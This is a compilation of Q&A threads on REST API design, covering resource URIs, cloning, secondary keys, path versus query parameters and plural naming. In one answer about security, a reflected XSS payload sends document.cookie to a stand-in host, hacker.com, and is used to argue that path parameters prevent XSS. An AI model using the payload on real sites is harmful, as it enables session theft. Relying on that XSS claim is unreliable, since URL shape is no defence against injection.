I am trying to design a REST API for a system where the resources are essentially identified by path-like addresses with varying numbers of segments. For example, a "Schema" resource could be represented on the file system as follows:
/Resources/Schemas/MyFolder2/MyFolder5/MySchema27
The file-system path /Resources/Schemas/ is the root folder for all Schemas, and everything below this is entirely user defined (as far as folder depth and folder naming). So, in the example above, the particular Schema would be uniquely identified by the following address (since "MySchema27" by itself would not necessarily be unique):
/MyFolder2/MyFolder5/MySchema27
What would be the best way to refer to a resource like this in a REST API?
If I have a /schemas collection my REST URL could be:
/schemas/MyFolder2/MyFolder5/MySchema27
Would that be a reasonable approach? Are there better ways of handling this?
I could, potentially, do a 2-step approach where the client would first have to search for a Schema using the Schema address (in URL parameters or in the request body), which would then return a unique ID that could then be used with a more traditional /schemas/{id} design. Not sure that I like that, though, especially since it would mean tracking a separate ID for each resource. Thoughts? Thanks.
The usual way to add a resource to your "folder" /Resources/Schemas/ is to make a POST request on it with the body of this POST request containing a representation of the resource to add, then the server will take care of finding the next free {id} and and setting the new resource to /Resources/Schemas/{id}.
Another approach is to, as you said, make a GET request on /Resources/Schemas/new which would return the next free {id}, and then, make a second request PUT directly on /Resources/Schemas/{id}. However this second approach is not as secure as the first since two simultaneous request could lead to the same new {id} returned and so the second PUT would erase the first. You can secure this with some sort of reservation mechanism.
This is called as Resource Based URI approach for building REST services . Follow these wonderful set of video tutorials to understand more about them and learn how to implement too . https://javabrains.io/courses/javaee_jaxrs
Related
As from the specification of the project I am working, it is required to expose an API that allows to change the status of a user entity to be one of [ VALID | NOT_VALID | TO_VALIDATE ].
Current API for users have this path
/user/:user_id
my idea was to add a new sub-path for POST with url:
/user/:user_id/status
Since I want to update just a single value which design choice you would find to be the best?
Using the request's body (JSON)
Using the query string e.g. /user/:user_id/status?value=VALID
Creating three endpoints, one for each possible status' value:
/user/:user_id/status/valid
/user/:user_id/status/not_valid
/user/:user_id/status/to_validate
Thanks.
If status is something that is not query-able, then you could even have it as part of the user entity itself like /user/:user_id and do a PATCH (with the JSON payload) to update the status. Generally, people prefer nested paths if the sub-path can be queried as sub-resource on its own or updated independently. So if someone needs the status of a user, would he not expect that to come in the GET result of /user/:user_id? Or is he required to make another GET call to /user/:user_id/status? I think the /status path might not be a great idea.
Also, if you add something like status now, what will happen if you need to update name, address etc. in the future. We don't want to keep adding new sub-paths for every field right? Also having an enum-like sub-path in the URL path (valid/not_valid etc.) doesn't seem to be the right thing to do. If you include it in the JSON payload, it would come under the schema and you could version it nicely in case you make new additions to the enum. Having it as part of the URL means the clients now have to know about the new path as well.
On the other hand, you should also think about usability of the API. One rule of thumb I generally follow in designing REST APIs: I want my clients to integrate with my API in 2 minutes or so and I have to minimise the number of things he needs to know in order to successfully integrate. All standards and norms might come secondary to usability.
I have REST API that exposes a complex large resource and I want to be able to clone this resource. Assume that the resource is exposed at /resources/{resoureId}
To clone resource 10 I could do something like.
GET /resources/10
POST /resources/ body of put containing a duplicate of the representation by GET /resources/10 without the id so that the POST creates a new resource.
The problem with this approach is that the resource is very large and complex it really makes no sense to return a full representation to the client and then have the client send it back as that would be just a total waste of bandwidth, and cpu on the server. Cloning the resource on the server is so much easier so I want to do that.
I could do something like POST /resources/10/clone or POST resources/clone/10 but both of these approaches feel wrong because the verb in the URL.
What is the most "restful/nouny" way to build url that can be used in this type of situation?
Since there is no copy or clone method in HTTP, it's really up to you what you want to do. In this case a POST seems perfectly reasonable, but other standards have taken different approaches:
WebDAV added a COPY method.
Amazon S3 uses PUT with no body and a special x-amz-copy-source header. They call this a PUT Object - Copy.
Both of these approaches assume that you know the destination URI. Your example seems to lack a known destination uri, so you pretty much must use POST. You can't use PUT or COPY because your creation operation is not idempotent.
If your service defines POST /resources as "create a new resource", then why not simply define another way to specify the resource other than as the body of the POST? E.g. POST /resources?source=/resources/10 with an empty body.
Francis' answer is a great one and probably what you're looking for. With that said, it's not technically RESTful since (as he says in the comments) it does rely on the client providing out of band information. Since the question was "what is the restful way" and not "what is a good way/the best way", that got me thinking about whether there is a RESTful solution. And I think what follows is a RESTful solution, although I'm not sure that it's necessarily any better in practice.
Firstly, as you've already identified, GET followed by POST is the simple and obvious RESTful way, but it's not efficient. So we're looking for an optimization, and we shouldn't be too surprised if it feels a little less natural than that solution!
The POST + sourceId solution creates a special URL - one that points not to a resource, but to an instruction to do something. Any time you find yourself creating special URLs like that, it's worth considering whether you can work around the need to do that by simply defining more resources.
We want the ability to copy
resources/10
What if we come up with another resource:
resources/10/copies
...and the definition of this resource is simply "the collection of resources that are copies of resource/10".
With this resource defined, we can now re-state our copy operation in different terms - instead of saying "I want the server to copy resources/10", we can say "I want to add a new thing to the collection of things that are copies of resources/10".
This sounds strange, but it fits naturally into REST semantics. For instance, let's say this resource currently looks like this (I'm going to use a JSON representation here):
[]
We can just update that with a POST or PATCH [1]:
POST resources/copies/10
["resources/11"]
Note that all we're sending to the server is metadata about a collection, so it's very efficient. We can assume that the server now knows where to get the data to copy, since that's part of the definition of this resource. We can also assume that the client knows that this results in a new resource being created at "resources/11" for the same reason.
With this solution, everything is defined clearly as a resource, and everything has one canonical URL, and no out-of-band information is ever required by the client.
Ultimately, is it worth going with this strange-feeling solution just for the sake of being more RESTful? That probably depends on your individual project. But it's always interesting to try and frame the problem differently by creating different resources!
[1] I don't know if makes sense to allow GET on "resources/10/copies". Obviously as soon as either the original resource or a copy of it change, the copy isn't really a copy any more and shouldn't be in this collection. Implementation-wise, I don't see the point in burdening the server with keeping track of that, so I think this should be treated as an update-only resource.
I think POST /resources/{id} would be a good solution to copy a resource.
Why?
POST /resources is the default REST-Standard to CREATE a new resource
POST /resources/{id} should not be possible in most REST apis, because that id already exists - you will never generate a new resource with you (the client) defining the id. The server will define the id.
Also note that you will never copy resource A on resource B. So if you want to copy existing resource with id=10, some answers suggest this kind of thing:
POST /resources?sourceId=10
POST /resources?copyid=10
but this is simpler:
POST /resources/10
which creates a copy of 10 - you have to retrieve 10 from storage, so if you don't find it, you cannot copy it = throw a 404 Not Found.
If it does exist, you create a copy of it.
So using this idea, you can see it does not make sense to do the following, copying some b resource to some a resource:
POST /resources?source=/resources/10
POST /resources-a?source=/resources-b/10
So why not simply use POST /resources/{id}
It will CREATE a new resource
The copy parent is defined by the {id}
The copy will be only on the same resource
It's the most REST-like variant
What do you think about this?
You want to create a copy of a specific resource. My Approach in that case, would be to use the following endpoint :
POST /resources/{id}/copy, read it "create a copy of resource {id}"
Will just put it out there, if this can be of help to anyone.
We had a similar scenario, where we were providing "clone vm" as a feature for scaling out on our IaaS offering. So if a user wanted to scale out they would have to hit POST: /vms/vm101 endpoint with request_body being
{"action": "clone", // Specifies action to take, since our users can do couple of other actions on a vm, like power_off/power_on etc.
"body": {"name": [vm102, vm103, vm104] // Number of clones to make
"storage": 50, ... // Optional parameters for specifying differences in specs one would want from the base virtual machine
}
and 3 clones of vm101 viz. vm102, vm103 and vm104 would be spinned.
Simple question I'm having trouble finding an answer to..
If I have a REST web service, and my design is not using url parameters, how can I specify two different keys to return the same resource by?
Example
I want (and have already implemented)
/Person/{ID}
which returns a person as expected.
Now I also want
/Person/{Name}
which returns a person by name.
Is this the correct RESTful format? Or is it something like:
/Person/Name/{Name}
You should only use one URI to refer to a single resource. Having multiple URIs will only cause confusion. In your example, confusion would arise due to two people having the same name. Which person resource are they referring to then?
That said, you can have multiple URIs refer to a single resource, but for anything other than the "true" URI you should simply redirect the client to the right place using a status code of 301 - Moved Permanently.
Personally, I would never implement a multi-ID scheme or redirection to support it. Pick a single identification scheme and stick with it. The users of your API will thank you.
What you really need to build is a query API, so focus on how you would implement something like a /personFinder resource which could take a name as a parameter and return potentially multiple matching /person/{ID} URIs in the response.
I guess technically you could have both URI's point to the same resource (perhaps with one of them as the canonical resource) but I think you wouldn't want to do this from an implementation perspective. What if there is an overlap between IDs and names?
It sure does seem like a good place to use query parameters, but if you insist on not doing so, perhaps you could do
person/{ID}
and
personByName/{Name}
I generally agree with this answer that for clarity and consistency it'd be best to avoid multiple ids pointing to the same entity.
Sometimes however, such a situation arises naturally. An example I work with is Polish companies, which can be identified by their tax id ('NIP' number) or by their national business registry id ('KRS' number).
In such case, I think one should first add the secondary id as a criterion to the search endpoint. Thus users will be able to "translate" between secondary id and primary id.
However, if users still keep insisting on being able to retrieve an entity directly by the secondary id (as we experienced), one other possibility is to provide a "secret" URL, not described in the documentation, performing such an operation. This can be given to users who made the effort to ask for it, and the potential ambiguity and confusion is then on them, if they decide to use it, not on everyone reading the documentation.
In terms of ambiguity and confusion for the API maintainer, I think this can be kept reasonably minimal with a helper function to immediately detect and translate the secondary id to primary id at the beginning of each relevant API endpoint.
It obviously matters much less than normal what scheme is chosen for the secret URL.
I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.
Which one of these URIs would be more 'fit' for receiving POSTs (adding product(s))? Are there any best practices available or is it just personal preference?
/product/ (singular)
or
/products/ (plural)
Currently we use /products/?query=blah for searching and /product/{productId}/ for GETs PUTs & DELETEs of a single product.
Since POST is an "append" operation, it might be more Englishy to POST to /products, as you'd be appending a new product to the existing list of products.
As long as you've standardized on something within your API, I think that's good enough.
Since REST APIs should be hypertext-driven, the URI is relatively inconsequential anyway. Clients should be pulling URIs from returned documents and using those in subsequent requests; typically applications and people aren't going to need to guess or visually interpret URIs, since the application will be explicitly instructing clients what resources and URIs are available.
Typically you use POST to create a resource when you don't know the identifier of the resource in advance, and PUT when you do. So you'd POST to /products, or PUT to /products/{new-id}.
With both of these you'll return 201 Created, and with the POST additionally return a Location header containing the URL of the newly created resource (assuming it was successfully created).
In RESTful design, there are a few patterns around creating new resources. The pattern that you choose largely depends on who is responsible for choosing the URL for the newly created resource.
If the client is responsible for choosing the URL, then the client should PUT to the URL for the resource. In contrast, if the server is responsible for the URL for the resource then the client should POST to a "factory" resource. Typically the factory resource is the parent resource of the resource being created and is usually a collection which is pluralized.
So, in your case I would recommend using /products
You POST or GET a single thing: a single PRODUCT.
Sometimes you GET with no specific product (or with query criteria). But you still say it in the singular.
You rarely work plural forms of names. If you have a collection (a Catalog of products), it's one Catalog.
I would only post to the singular /product. It's just too easy to mix up the two URL-s and get confused or make mistakes.
As many said, you can probably choose any style you like as long as you are consistent, however I'd like to point out some arguments on both sides; I'm personally biased towards singular
In favor of plural resource names:
simplicity of the URL scheme as you know the resource name is always at plural
many consider this convention similar to how databases tables are addressed and consider this an advantage
seems to be more widely adopted
In favor of singular resource names (this doesn't exclude plurals when working on multiple resources)
the URL scheme is more complex but you gain more expressivity
you always know when you are dealing with one or more resources based on the resource name, as opposed to check whether the resource has an additional Id path component
plural is sometimes harder for non-native speakers (when is not simply an "s")
the URL is longer
the "s" seems to be a redundant from a programmers' standpoint
is just awkward to consider the path parameter as a sub-resource of the collection as opposed to consider it for what it is: simply an ID of the resource it identifies
you can apply the filtering parameters only where they are needed (endpoint with plural resource name)
you could use the same url for all of them and use the MessageContext to determine what type of action the caller of the web service wanted to perform.
No language was specified but in Java you can do something like this.
WebServiceContext ws_ctx;
MessageContext ctx = ws_ctx.getMessageContext();
String action = (String)ctx.get(MessageContext.HTTP_REQUEST_METHOD);
if(action.equals("GET")
// do something
else if(action.equals("POST")
// do something
That way you can check the type of request that was sent to the web service and perform the appropriate action based upon the request method.